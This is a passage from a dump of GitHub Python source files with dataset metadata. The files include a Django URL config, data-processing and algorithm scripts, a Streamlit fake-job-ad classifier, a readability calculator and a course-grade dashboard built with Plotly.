scale_factor)\n row_add(A, row_index1, row_index2)\n inverse_scale_factor = 1 / scale_factor\n row_scale(A, row_index2, inverse_scale_factor)\n","repo_name":"NicholasDowell/Matrix-Calculator","sub_path":"MatrixOperations.py","file_name":"MatrixOperations.py","file_ext":"py","file_size_in_byte":5881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1851159753","text":"from django.conf.urls.defaults import *\n\nimport views\n\nurlpatterns = patterns('',\n (r'^$', views.index),\n (r'^stats/$', views.stats),\n (r'^stats_table/$', views.stats_table),\n (r'^put/$', views.put),\n (r'^ready/(?P<tube>[\\w-]*)$', views.ready),\n (r'^delayed/(?P<tube>[\\w-]*)$', views.delayed),\n (r'^buried/(?P<tube>[\\w-]*)$', views.buried),\n (r'^inspect/(?P<id>\\d*)$', views.inspect),\n (r'^tube/(?P<tube>[\\w-]+)/stats/$', views.tube_stats),\n (r'^job/(?P<id>\\d+)/delete/$', views.job_delete),\n (r'^job/(?P<id>\\d+)/kick/$', views.job_kick),\n)\n","repo_name":"andreisavu/django-jack","sub_path":"jack/beanstalk/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"53"} +{"seq_id":"27199465532","text":"from item.util import convert_units\n\n#: iTEM data flow matching the data from this source.\nDATAFLOW = \"EMISSIONS\"\n\n#: Dimensions and attributes which do not vary across this data set.\nCOMMON_DIMS = dict(\n source=\"JRC\",\n variable=\"Emissions\",\n pollutant=\"CO2\",\n lca_scope=\"TTW\",\n service=\"_T\",\n vehicle=\"_T\",\n fuel=\"_T\",\n technology=\"_T\",\n)\n\n#: Columns to drop from the raw data.\nCOLUMNS = dict(\n drop=[\"IPCC_description\", \"IPCC-Annex\", \"Name\", \"World Region\"],\n)\n\n#: Map from IPCC emissions category codes to iTEM ``CL_MODE`` values. The actual\n#: descriptions appear in the ``IPCC_description`` column, which is discarded.\n#:\n#: - 1.A.3.a: Civil Aviation\n#: - 1.A.3.b: Road Transportation\n#: - 1.A.3.c: Railways\n#: - 1.A.3.d: Water-borne Navigation\n#: - 1.A.3.e: Other Transportation\nMAP_MODE = {\n \"1.A.3.a\": \"Air\",\n \"1.A.3.b\": \"Road\",\n \"1.A.3.c\": \"Rail\",\n \"1.A.3.d\": \"Water\",\n \"1.A.3.e\": \"Other\",\n}\n\n\ndef process(df):\n \"\"\"Process T005.\n\n 1. Select only measures with IDs beginning \"1.A.3\".\n 2. Map from the IPCC emissions category (e.g. \"1.A.3.a\") to mode (e.g. \"Air\"); see\n :func:`map_mode`.\n 3. Melt from wide to long format.\n 4. Drop NA values.\n 5. Use “_X” (not allocated/unspecified) as the region for international shipping and\n aviation.\n 6. Convert from Mt/a to Gt/a.\n \"\"\"\n return (\n df[df[\"IPCC\"].str.startswith(\"1.A.3\")]\n .assign(MODE=lambda df_: df_[\"IPCC\"].apply(MAP_MODE.get))\n .drop(columns=[\"IPCC\"])\n .melt(id_vars=[\"ISO_A3\", \"MODE\"], var_name=\"TIME_PERIOD\", value_name=\"VALUE\")\n .dropna(subset=[\"VALUE\"])\n .rename(columns={\"ISO_A3\": \"REF_AREA\"})\n .replace({\"REF_AREA\": {\"SEA\": \"_X\", \"AIR\": \"_X\"}})\n .pipe(convert_units, \"megatonne / year\", \"gigatonne / year\")\n )\n","repo_name":"transportenergy/database","sub_path":"item/historical/T005.py","file_name":"T005.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"39272078035","text":"# O(n) time | O(1) space\ndef minNumberOfJumps(array):\n # Write your code here.\n if len(array) == 1:\n return 0\n jumps = 0\n maxReach = array[0]\n steps = array[0]\n for i in range(1, len(array) - 1):\n maxReach = max(maxReach, i + array[i])\n steps -= 1\n if steps == 0:\n jumps += 1\n steps = maxReach - i\n return jumps + 1\n\n\n\n# Solution 2\n# O(n^2) time | O(n) space\n# def minNumberOfJumps(array):\n# # Write your code here.\n# jumps = [float(\"inf\") for x in array]\n# jumps[0] = 0\n# for i in range(1, len(array)):\n# for j in range(0, i):\n# if array[j] >= i - j:\n# jumps[i] = min(jumps[j] + 1, jumps[i])\n# return jumps[-1]\n\n\n\n# Solution 3\n# def minNumberOfJumps(array):\n# # Write your code here.\n# jump = 1\n# a, b = array[0], array[0]\n# if len(array) == 0 or len(array) == 1:\n# return 0\n\n# for i in range(1, len(array)):\n# if i == len(array) - 1:\n# return jump\n\n# a -= 1\n# b -= 1\n# if array[i] > b:\n# b = array[i]\n\n# if a == 0:\n# a = b\n# jump += 1\n# return jump\n","repo_name":"Wanderer-Keerthi/algo-expert","sub_path":"min_number_of_jumps.py","file_name":"min_number_of_jumps.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73232949929","text":"import socket\n\nfrom _thread import start_new_thread\nimport threading\n\nlock = threading.Lock()\n\ndef threaded(con):\n while True:\n data = con.recv(1024)\n\n if not data:\n print(\"Bye\")\n lock.release()\n break\n\n data = data[::-1]\n\n con.send(data)\n\n con.close()\n\ndef main():\n host = \"\"\n port = 8080\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # bind to port = 8080\n s.bind((host,port))\n\n # listen\n s.listen(5)\n\n while True:\n\n con, adr = s.accept()\n\n # acquire lock\n lock.acquire()\n print(adr[0], adr[1])\n\n start_new_thread(threaded, (con,))\n\n s.close()\n\nif __name__ == \"__main__\":\n main()","repo_name":"userarpit/Python","sub_path":"socket/serverthread.py","file_name":"serverthread.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41735351324","text":"import streamlit as st\nimport requests\nimport json\nimport pandas as pd\nfrom PIL import Image\nimport nltk\nimport re\nimport pickle\nimport string\nfrom nltk.corpus import stopwords\nfrom nltk.stem import SnowballStemmer\nfrom tensorflow.keras.preprocessing.text import one_hot, Tokenizer\nfrom tensorflow.keras.layers import Embedding\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\n\nst.set_page_config(\n page_title=\"Job Fake Prediction\",\n page_icon=\"💼\",\n initial_sidebar_state=\"collapsed\",\n layout = \"wide\",\n menu_items={\n 'Get Help': 'https://www.google.com/',\n 'Report a bug': \"https://github.com/marwanmusa\",\n 'About': \"# Milestone 2 - Job Fake Prediction Application\"\n }\n)\n\ncol1, col2, col3 = st.columns([2,4,2])\nwith col2:\n image = Image.open('logo.png')\n st.image(image, use_column_width=True)\n\nst.markdown(\"\")\nst.markdown(\"\")\nst.markdown(\"\")\n# image input input #\nst.markdown(\"<h2 style='text-align: center; color: black;'>Input the Job Ads Description 💼</h2>\", unsafe_allow_html=True)\nwith st.container():\n description1 = st.text_area(\"\", placeholder=\"Paste here...\")\n\nsubmitted_text = st.button('submit')\n\nif submitted_text:\n st.markdown(\"\")\n st.markdown(\"\")\n st.markdown(\"\") \n with st.container():\n st.markdown(f\"### ***Your input is :*** \\n {description1}\")\n \n fraudulent = 1 # default value // not impacting the model result\n isidata = [description1, fraudulent] \n columns = ['description', 'fraudulent']\n\n data_ = pd.DataFrame(data = [isidata], columns = columns) \n\n # Menghilangkan kata-kata yang ada dalam list stopwords-english\n nltk.download('stopwords')\n\n # Fungsi untuk clean data\n def clean_text(text):\n '''Make text lowercase, remove text in square brackets,remove links,remove punctuation\n and remove words containing numbers.'''\n text = str(text).lower() # Membuat text menjadi lower case\n text = re.sub('\\[.*?\\]', '', text) # Menghilangkan text dalam square brackets\n text = re.sub('https?://\\S+|www\\.\\S+', '', text) # menghilangkan links\n text = re.sub('<.*?>+', '', text) # Menghilangkan text dalam <>\n text = re.sub('[%s]' % re.escape(string.punctuation), '', text) # menghilangkan punctuatuion \n text = re.sub('\\n', '', text) # Menghilangkan enter / new line\n text = re.sub('\\w*\\d\\w*', '', text) # Menghilangkan karakter yang terdiri dari huruf dan angka\n return text\n\n # cleaning data\n infdat = data_.drop('fraudulent', axis = 1)\n infdat['description'] = infdat['description'].apply(lambda x:clean_text(x))\n\n # Defining corpus with cleaned data\n ss = SnowballStemmer(language='english') \n corpusinf = []\n for i in range(0, len(infdat)):\n decsr = infdat['description'][i]\n decsr = decsr.split() # splitting data\n decsr = [ss.stem(word) for word in decsr if not word in stopwords.words('english')] # steeming setiap huruf dengan pengecualian kata yang ada dalam stopwords\n decsr = ' '.join(decsr)\n corpusinf.append(decsr)\n\n infdat['corpusinf'] = corpusinf\n infdat.reset_index(inplace = True)\n\n # encoding\n voc_size = 5000\n inf_enc_corps = [one_hot(words, voc_size) for words in corpusinf]\n\n # loading\n with open('tokenizer.pickle', 'rb') as handle:\n tokenizer = pickle.load(handle)\n\n # Tokenization\n descr_length = 40\n inf_word_idx = tokenizer.texts_to_sequences(infdat['corpusinf'])\n inf_padded_seqs = pad_sequences(inf_word_idx, maxlen = descr_length)\n\n input_data_json = json.dumps({\n \"signature_name\": \"serving_default\",\n \"instances\": inf_padded_seqs.tolist(),\n })\n\n URL = \"http://fakejobprediction-app.herokuapp.com/v1/models/fake_job_prediction:predict\"\n\n response = requests.post(URL, data=input_data_json)\n response.raise_for_status() # raise an exception in case of error\n response = response.json()\n\n # st.markdown(\"<h2 style='text-align: center; color: black;'>Customer's Data Recap</h2>\", unsafe_allow_html=True)\n st.markdown(\"\")\n st.markdown(\"\")\n st.markdown(\"\")\n st.markdown(\"### *& The Prediction is :*\") \n for res in response['predictions'][0]:\n if res > 0.5:\n st.markdown(\"<h2 style='text-align: center; color: red;'>Fake Job Ads</h2>\", unsafe_allow_html=True)\n else:\n st.markdown(\"<h2 style='text-align: center; color: green;'>Real Job Ads</h2>\", unsafe_allow_html=True)\n\n","repo_name":"marwanmusa/NLP-FakeJobPost-Prediction","sub_path":"frontend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33912355148","text":"import loader\nimport torch\nimport numpy as np\nimport pandas as pd\nimport os\n\nfrom facenet_pytorch import MTCNN, InceptionResnetV1\nfrom torch.utils.data import DataLoader\nfrom PIL import Image, ImageDraw\nfrom torchvision import datasets\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\nprint('Running on device: {}'.format(device))\n\nmtcnn = MTCNN(\n image_size=160, margin=0, min_face_size=20,\n thresholds=[0.6, 0.7, 0.7], factor=0.709, post_process=True,\n device=device\n)\n\nfilename = '0a4f0c8985297ed7.mp4'\n# filename = '0a8e8e7b229fe1fc.mp4'\nfilepath = f'datasets/train/videos/{filename}'\n\nvideo = loader.load_video(filepath, every_n_frames=20, scale=0.5)\nprint(f'length = {len(video.out_video)}')\nimage = video.out_video[10]\n\nbboxes, confs = mtcnn.detect(video.out_video[10:20])\nprint(f'BBOX = {bboxes}')\nbox = bboxes[0][0]\n\npil_img = Image.fromarray(image)\nimg_draw = ImageDraw.Draw(pil_img)\nleft, top, right, bottom = box\nprint(f'BOX = {box}')\nshape = [(left, top), (right, bottom)]\nimg_draw.rectangle(shape, outline='#AAFF00', width=10)\npil_img.show()\n\nprint(f'bbox = {bbox}')\n\n\n","repo_name":"milselarch/AISG","sub_path":"neural_detect.py","file_name":"neural_detect.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3949063845","text":"# Yoon Hyup Hwang, Zhou Tan\nimport functools\nimport math\nimport operator\n\ndef main():\n print(\"This project is collaboratively finished by Yoon Hyup Hwang and Zhou Tan\")\n fileName = input(\"Type in your file name('q' to quit the program): \")\n while fileName != 'q':\n text = readFile(fileName)\n sentences = getSentences(text)\n sentenceCount = getSentenceCount(sentences)\n dictionary = {}\n wordCount = getWordCount(sentences, dictionary)\n longWordCount = getLongWordCount(sentences)\n polysyllabicWordCount = getPolysyllableWordCount(sentences)\n letterCount = getLetterCount(sentences)\n syllableCount = getSyllableCount(sentences)\n KincaidMeasure = getKincaidMeasure(sentenceCount, wordCount, \n syllableCount)\n print(\"1. KincaidMeasure: \", KincaidMeasure)\n ARImeasure = getARImeasure(sentenceCount, wordCount, letterCount)\n print(\"2. ARImeasure: \", ARImeasure)\n ColemanLiauMeasure = getColemanLiauMeasure(sentenceCount, wordCount, \n letterCount)\n print(\"3. ColemanLiauMeasure: \", ColemanLiauMeasure)\n FleschMeasure = getFleschMeasure(sentenceCount, wordCount, syllableCount)\n print(\"4. FleschMeasure: \", FleschMeasure)\n GunningFogMeasure = getGunningFogMeasure(sentenceCount, wordCount, \n polysyllabicWordCount)\n print(\"5. GunningFogMeasure: \", GunningFogMeasure)\n LixMeasure = getLixMeasure(sentenceCount, wordCount, longWordCount)\n print(\"6. LixMeasure: \", LixMeasure)\n SmogMeasure = getSmogMeasure(wordCount, polysyllabicWordCount)\n print(\"7. SmogMeasure: \", SmogMeasure)\n Richness = getRichness(dictionary)\n print(\"8. Richness: \", Richness)\n wordStats = [(key, dictionary[key]) for key in dictionary.keys()]\n sortedwordStats = sorted(wordStats, key = operator.itemgetter(1),\n reverse = True)\n print('Top 10 Frequent words:')\n for i in range(10):\n print(sortedwordStats[i][0], sortedwordStats[i][1], sep = ': ')\n fileName = input(\"Type in your file name('q' to quit the program): \")\n print(\"Goodbye!\")\n return None\n\ndef readFile(fileName):\n '''Read the input text file.'''\n lineLists = []\n with open(fileName) as file:\n for line in file:\n lineLists.append(line)\n return lineLists\n\ndef getSentences(text):\n '''Reorganize and clean sentences from the raw input.'''\n filteredList = []\n filteredLine = ''\n previousChar = ''\n if(text[-1][-1] not in '.!?'):\n text[-1] += '.'\n for line in text:\n #check if the previous line doesn't end a sentence and starts with no spacs in between words\n if previousChar != ' ' and line[0] not in '.!? ':\n filteredLine += ' '\n for char in line:\n if char not in '.!?':\n filteredChar = char.lower()\n if not (char.isalpha() or char == '\\''):\n if previousChar == ' ':\n continue\n else:\n filteredChar = ' '\n filteredLine += filteredChar\n previousChar = filteredChar\n elif len(filteredLine.strip()) != 0:\n filteredList.append(filteredLine.strip())\n filteredLine = ''\n return filteredList\n \ndef getSentenceCount(sentences):\n '''Get the total sentence count.'''\n return len(sentences)\n\ndef getWordCount(sentences, dictionary):\n '''Get the total word count.'''\n wordLists = []\n wordCount = 0\n for sentence in sentences:\n #words have been filtered already, just split them up\n wordLists = sentence.split()\n wordCount += len(wordLists)\n for word in wordLists:\n if(word in dictionary.keys()):\n dictionary[word] += 1\n else:\n dictionary[word] = 1\n return wordCount\n\ndef getLongWordCount(sentences):\n '''Get the Long word(words with 6 or more litters) count.'''\n wordLists = []\n longWordCount = 0\n for sentence in sentences:\n wordLists = sentence.split()\n for word in wordLists:\n if(len(word) >= 6):\n longWordCount += 1\n return longWordCount\n\ndef getPolysyllableWordCount(sentences):\n '''Get the total word count with ploy(three or more) syllable.'''\n worldLists = []\n polyCount = 0\n for sentence in sentences:\n wordLists = sentence.split()\n for word in wordLists:\n count = checkSyllable(word)\n if count >= 3:\n polyCount += 1\n return polyCount\n\ndef getLetterCount(sentences):\n '''Get the total letter count.'''\n letter = ''\n for sentence in sentences:\n letter += ''.join(list(filter(lambda x: x.isalpha() , sentence)))\n return len(letter)\n\ndef getSyllableCount(sentences):\n '''Get the total syllable count.'''\n worldLists = []\n syllableCount = 0\n for sentence in sentences:\n wordLists = sentence.split()\n for word in wordLists:\n syllableCount += checkSyllable(word) #strip out apostrophes\n return syllableCount\n\ndef checkSyllable(word):\n '''Check how many syllables are there for the given word.'''\n firstSyllable = ''\n syllableCount = 0\n if len(word) <= 3:\n return 1\n for i in range(0, len(word)):\n #find a vowel\n if(word[i] in 'aeiouy'): \n if (firstSyllable == ''):\n firstSyllable = word[i]\n #consonant followed by a vowel, count it\n elif firstSyllable != '':\n syllableCount += 1\n firstSyllable = ''\n #last vowel also counts\n if word[-1] in 'aeiouy':\n syllableCount += 1\n if (syllableCount == 0):\n return 1\n if ((word[-2:] in ['es', 'ed'] and word[-3] not in \"aeiouy\") \n or (word.endswith('e') and not word.endswith('le') and word[-2] not in 'aeiouy')):\n syllableCount -= 1\n if (word.startswith('y') and word[1] not in 'aeiouy'):\n syllableCount -= 1\n if syllableCount == 0:\n return 1\n return syllableCount\n\ndef getKincaidMeasure(sentenceCount, wordCount, syllableCount):\n '''Return with the Kincaid measurement.'''\n return ((11.8 * syllableCount / wordCount) + (0.39 * wordCount / sentenceCount) - 15.59)\n\ndef getARImeasure(sentenceCount, wordCount, letterCount):\n '''Return with the Automated Readability Index measurement.'''\n return ((4.71 * letterCount / wordCount) + (0.5 * wordCount / sentenceCount) - 21.43)\n\ndef getColemanLiauMeasure(sentenceCount, wordCount, letterCount):\n '''Return with the Coleman-Liau measurement.'''\n return ((5.89 * letterCount / wordCount) - ((0.3 * sentenceCount) / (100 * wordCount)) - 15.8)\n\ndef getFleschMeasure(sentenceCount, wordCount, syllableCount):\n '''Return with the Flesch measurement.'''\n return (206.835 - (84.6 * syllableCount / wordCount) - (1.015 * wordCount / sentenceCount))\n\ndef getGunningFogMeasure(sentenceCount, wordCount, polysyllabicWordCount):\n '''Return with the Fog(Gunning) measurement.'''\n return (0.4 * (wordCount / sentenceCount + \n 100 * polysyllabicWordCount / wordCount))\n\ndef getLixMeasure(sentenceCount, wordCount, longWordCount):\n '''Return with the Lix measurement.'''\n return (wordCount / sentenceCount + 100 * longWordCount / wordCount)\n\ndef getSmogMeasure(wordCount, polysyllabicWordCount):\n '''Return with the SMOG measurement.'''\n return (3 + math.sqrt(30 * polysyllabicWordCount / wordCount))\n\ndef getRichness(dictionary):\n '''Get how 'rich' the vocabulary is for given dictionary.'''\n wordStats = [(key, dictionary[key]) for key in dictionary.keys()]\n sortedwordStats = sorted(wordStats, key = operator.itemgetter(1),\n reverse = True)\n totalWordCount = 0\n wordCount = 0\n richness = 0\n for (word, count) in sortedwordStats:\n totalWordCount += count\n for (word, count) in sortedwordStats:\n wordCount += count\n richness += 1\n if (wordCount >= 0.5 * totalWordCount):\n break\n return richness\n","repo_name":"zhoujoetan/Readability","sub_path":"readability.py","file_name":"readability.py","file_ext":"py","file_size_in_byte":8263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19163596291","text":"import dash\nfrom dash import html\nimport pandas as pd\nimport plotly.express as px\nfrom dash import dcc\n\n# Constants\nrubric_heading = 'On a scale from 1 to 5, how satisfied are you with the rubric for this project?'\nproject_review_col = \"Which project are you reviewing (enter a # between 1 and 11)?\"\nhomework_review_col = \"Which homework assignment are you reviewing (enter a # between 1 and 22)?\"\npre_emotions_column = \"Which of the following emotions did you experience **before** starting this project (select all that apply)?\"\nduring_emotions_column = \"Which of the following emotions did you experience while completing this project (select all that apply)?\"\npost_emotions_column = \"Which of the following emotions did you experience **after** completing this project (select all that apply)?\"\ntime_col = \"How much time did you spend on this assignment in hours?\"\navg_time = \"Average Time (hours)\"\nmedian_time = \"Median Time (hours)\"\nreview_count = \"Number of Reviews\"\nstd_time = \"Standard Deviation (hours)\"\nassignment_type = \"Are you reviewing a project or a homework assignment?\"\nsatisfaction_mapping = {\n 1: 'Very Dissatisfied', \n 2: 'Dissatisfied', \n 3: 'Neutral', \n 4: 'Satisfied', \n 5: 'Very Satisfied'\n}\nlikert_scale = [\"Strongly disagree\", \"Disagree\", \"Neutral\", \"Agree\", \"Strongly agree\"]\nlikert_scale_alt = [\"Poor\", \"Fair\", \"Satisfactory\", \"Very good\", \"Excellent\"]\nsatisfaction_colors = dict(zip(satisfaction_mapping.values(), px.colors.sequential.Viridis[::2]))\n\ndef create_value_fig(grade_data, assignment_survey_data, assignment, max_score):\n assignment_score_data = [name for name in grade_data.columns if assignment in name]\n assignment_calculations = grade_data[assignment_score_data].agg([\"mean\", \"median\"]).T\n assignment_time_data = assignment_survey_data[assignment_survey_data[assignment_type] == \"Project\"]\n assignment_time_data = assignment_time_data.drop_duplicates(subset=[project_review_col]).sort_values(by=project_review_col)\n assignment_time_data[\"Project #\"] = \"Project #\" + assignment_time_data[project_review_col].astype(int).astype(str)\n assignment_time_data = assignment_time_data.set_index(f\"{assignment} #\")[median_time]\n assignment_aggregate_data = assignment_calculations.join(assignment_time_data)\n assignment_aggregate_data = assignment_aggregate_data.rename(columns={'mean': f'Average Score/{max_score}', 'median': f'Median Score/{max_score}'})\n assignment_aggregate_data[\"Points per Hour\"] = assignment_aggregate_data[f\"Median Score/{max_score}\"] / assignment_aggregate_data[\"Median Time (hours)\"]\n assignment_aggregate_data[\"Minutes per Point\"] = assignment_aggregate_data[\"Median Time (hours)\"] / assignment_aggregate_data[f\"Median Score/{max_score}\"] * 60\n assignment_aggregate_data = assignment_aggregate_data.reset_index()\n assignment_expected_time_fig = px.bar(\n assignment_aggregate_data,\n x=\"index\",\n y=\"Points per Hour\",\n labels={\n \"index\": \"Project Name\",\n \"Points per Hour\": \"Median Points/Hour of Work\",\n },\n text_auto=\".2s\",\n title=\"Expected Value Per Project\"\n )\n assignment_expected_time_fig.update_layout(showlegend=False)\n assignment_expected_effort_fig = px.bar(\n assignment_aggregate_data,\n x=\"index\",\n y=\"Minutes per Point\",\n labels={\n \"index\": \"Project Name\",\n \"Minutes per Point\": \"Median Minutes of Work/Point\",\n },\n text_auto=\".2s\",\n title=\"Expected Effort Per Project\"\n )\n assignment_expected_effort_fig.update_layout(showlegend=False)\n return assignment_expected_time_fig, assignment_expected_effort_fig\n\n\ndef create_correlation_fig(grade_data, correlating_factor, label):\n grade_overview = generate_grade_overview(grade_data)\n\n total_scores = grade_overview[\"Exams\"] * .6 \\\n + grade_overview[\"Homeworks\"] * .06 \\\n + grade_overview[\"Projects\"] * .3 \\\n + grade_overview[\"Participation\"] * .04\n\n correlation = {\n \"Grades\": total_scores,\n label: grade_data[correlating_factor]\n }\n\n return px.scatter(\n pd.DataFrame(correlation),\n y=\"Grades\",\n x=label,\n trendline=\"ols\",\n title=f\"Grades vs {label}\"\n )\n\n\ndef generate_grade_overview(grade_data):\n grade_data = grade_data[grade_data[\"Date\"] != \"2020-05-07\"]\n exam_columns = [name for name in grade_data.columns if \"Exam\" in name]\n homework_columns = [name for name in grade_data.columns if \"Homework\" in name]\n project_columns = [name for name in grade_data.columns if \"Project\" in name]\n participation_columns = [name for name in grade_data.columns if \"Participation\" in name]\n\n exam_grades = grade_data[exam_columns].sum(axis=1) / (100 * 3) * 100\n homework_grades = grade_data[homework_columns].sum(axis=1) / (2 * 22) * 100\n project_grades = grade_data[project_columns].sum(axis=1) / (10 * 11) * 100\n participation_grades = grade_data[participation_columns].sum(axis=1) / (4 * 1) * 100\n\n overview_dict = {\n \"Exams\": exam_grades,\n \"Homeworks\": homework_grades,\n \"Projects\": project_grades,\n \"Participation\": participation_grades\n }\n\n return pd.DataFrame(overview_dict)\n\n\ndef create_grades_fig(grade_data):\n assignment_calculations = generate_grade_overview(grade_data).agg([\"mean\", \"median\"]).T\n grade_fig = px.bar(\n assignment_calculations,\n labels={\n \"index\": \"Assignment Type\",\n \"value\": \"Grade/100%\",\n \"variable\": \"Metric\",\n \"mean\": \"Average\",\n \"median\": \"Median\"\n },\n barmode=\"group\",\n title=f\"Overview of Course Grades by Type\"\n )\n return grade_fig\n\n\ndef create_assignment_fig(grade_data, assignment, total):\n assignment_data = [name for name in grade_data.columns if assignment in name]\n assignment_calculations = grade_data[assignment_data].agg([\"mean\", \"median\"]).T\n assignment_calculations.rename(columns={'mean': 'Average', 'median': 'Median'}, inplace=True)\n assignment_calculations_fig = px.bar(\n assignment_calculations,\n labels={\n \"index\": \"Project Name\",\n \"value\": f\"Grade/{total}\",\n \"variable\": \"Metric\",\n \"mean\": \"Average\",\n \"median\": \"Median\"\n },\n barmode='group',\n text_auto=\".2s\",\n title=f\"Average and Median {assignment} Grades\".title()\n )\n return assignment_calculations_fig\n\ndef create_course_eval_fig(course_eval_data, question, axes_labels):\n colors = dict(zip(axes_labels, satisfaction_colors.values()))\n question_data = course_eval_data.melt(\n id_vars=[item for item in course_eval_data.columns if question not in item],\n var_name=\"Question\",\n value_name=\"Response\"\n )\n question_data = question_data[question_data[\"Response\"].notna()]\n question_fig = px.histogram(\n question_data, \n x=\"Response\", \n color=\"Response\", \n facet_col=\"Question\", \n facet_col_wrap=2, \n category_orders=dict(Response=axes_labels),\n text_auto=True,\n title=f\"{question} by Subquestion\".title(),\n color_discrete_map=colors\n )\n question_fig.for_each_annotation(lambda a: a.update(text=a.text[a.text.find(\"[\")+1:a.text.find(\"]\")]))\n return question_fig\n\ndef create_sei_fig(sei_data):\n sei_data[\"Date\"] = pd.to_datetime(sei_data[\"Date\"])\n sei_fig = px.line(\n sei_data, \n x=\"Date\", \n y=\"Mean\", \n color=\"Group\", \n facet_col=\"Question\", \n facet_col_wrap=2, \n markers=True, \n title=\"Student Evaluation of Instruction Trends by Cohort\"\n )\n sei_fig.for_each_annotation(lambda a: a.update(text=a.text.split(\"=\")[-1]))\n return sei_fig\n\ndef create_time_fig(assignment_survey_data, col):\n to_plot = assignment_survey_data.drop_duplicates(subset=[col]).sort_values(by=col)\n to_plot = to_plot.melt(\n id_vars=[item for item in to_plot.columns if item not in [avg_time, median_time]], \n var_name=\"Metric\", \n value_name=\"Time (hours)\"\n )\n time_fig = px.bar(\n to_plot, \n x=col, \n y=\"Time (hours)\", \n color=\"Metric\", \n text_auto=\".2s\", \n barmode='group',\n title=\"Average and Median Assignment Time\",\n error_y=std_time,\n hover_data=[review_count]\n )\n time_fig.update_traces(textfont_size=12, textangle=0, textposition=\"inside\", insidetextanchor=\"start\", cliponaxis=False)\n return time_fig\n\ndef create_rubric_scores_fig(assignment_survey_data):\n rubric_scores = assignment_survey_data.groupby(project_review_col)[rubric_heading].agg([\"mean\", \"count\"])\n rubric_scores_fig = px.bar(\n rubric_scores, \n y=\"mean\", \n color=\"count\",\n labels={\n \"mean\": \"Average Score (out of 5)\",\n \"count\": \"Number of Reviews\"\n },\n text_auto=\".3s\",\n title=\"Project Rubric Satisfaction Scores\",\n color_continuous_scale=px.colors.sequential.Viridis\n )\n return rubric_scores_fig\n\ndef create_rubric_overview_fig(assignment_survey_data):\n data = assignment_survey_data[rubric_heading].value_counts()\n rubric_fig = px.bar(\n data, \n color=data.index,\n category_orders={\"index\": list(satisfaction_mapping.values())},\n labels={\n \"index\": 'Response',\n \"value\": 'Number of Reviews',\n \"color\": 'Response'\n },\n text_auto=True,\n title=\"Project Rubric Satisfaction Overview\",\n color_discrete_map=satisfaction_colors\n )\n return rubric_fig\n\ndef create_rubric_breakdown_fig(assignment_survey_data):\n data = assignment_survey_data.groupby(project_review_col)[rubric_heading] \\\n .value_counts() \\\n .unstack() \\\n .reset_index() \\\n .melt(id_vars=[project_review_col], var_name=\"Response\", value_name=\"Number of Reviews\") \\\n .dropna() \n rubric_breakdown_fig = px.bar(\n data, \n x=\"Response\",\n y=\"Number of Reviews\",\n color=\"Response\",\n facet_col=project_review_col, \n facet_col_wrap=2,\n text_auto=True,\n category_orders={\n rubric_heading: list(satisfaction_mapping.values()),\n project_review_col: list(range(1, 12))\n },\n labels={\n rubric_heading: 'Response',\n },\n title=\"Rubric Satisfaction By Project\",\n color_discrete_map=satisfaction_colors\n )\n rubric_breakdown_fig.for_each_annotation(lambda a: a.update(text=f'Project {a.text.split(\"=\")[-1]}'))\n return rubric_breakdown_fig\n\ndef create_missing_assignment_fig(grade_data, assignment):\n missing_assignment_data = (grade_data == 0).sum() / len(grade_data) * 100\n missing_assignment_data = missing_assignment_data.reset_index()\n missing_assignment_data.rename(columns={'index': 'Assignment', 0: 'Percent Missing'}, inplace=True)\n missing_assignment_data = missing_assignment_data.loc[missing_assignment_data[\"Assignment\"].str.contains(assignment)]\n missing_assignment_fig = px.bar(\n missing_assignment_data, \n x=\"Assignment\", \n y=\"Percent Missing\", \n text_auto=\".2s\", \n title=f\"Percent of Missing {assignment}s\"\n )\n return missing_assignment_fig\n\ndef create_project_trend_fig(grade_data, assignment):\n trend_data = grade_data.groupby(\"Date\").mean()[[item for item in grade_data if assignment in item]]\n trend_data = trend_data.reset_index().melt(\n id_vars=\"Date\",\n var_name=\"Assignment\", \n value_name=\"Average Score\"\n ).dropna()\n \n trend_fig = px.line(\n trend_data,\n x=\"Date\",\n y=\"Average Score\",\n color=\"Assignment\",\n markers=True,\n title=f\"Average {assignment} Score by Date\"\n )\n return trend_fig\n\ndef create_emotions_fig(assignment_survey_data, review_column):\n emotions_data = assignment_survey_data.explode(pre_emotions_column)\n emotions_data = emotions_data.explode(during_emotions_column)\n emotions_data = emotions_data.explode(post_emotions_column)\n emotions_data = emotions_data[emotions_data[pre_emotions_column].isin([\"Joy\", \"Hope\", \"Hopelessness\", \"Relief\", \"Anxiety\"])]\n emotions_data = emotions_data[emotions_data[during_emotions_column].isin([\"Enjoyment\", \"Anger\", \"Frustration\", \"Boredom\"])]\n emotions_data = emotions_data[emotions_data[post_emotions_column].isin([\"Joy\", \"Pride\", \"Gratitude\", \"Sadness\", \"Shame\", \"Anger\"])]\n emotions_data = emotions_data.groupby(review_column)[[pre_emotions_column, during_emotions_column, post_emotions_column]].value_counts() \n emotions_data = emotions_data.reset_index().melt(id_vars=review_column, value_vars=[pre_emotions_column, during_emotions_column, post_emotions_column])\n emotions_data = emotions_data.replace({\n pre_emotions_column: \"Pre-Assignment\",\n during_emotions_column: \"During Assignment\",\n post_emotions_column: \"Post-Assignment\"\n })\n emotions_figure = px.histogram(\n emotions_data,\n x=\"value\",\n color=\"variable\",\n 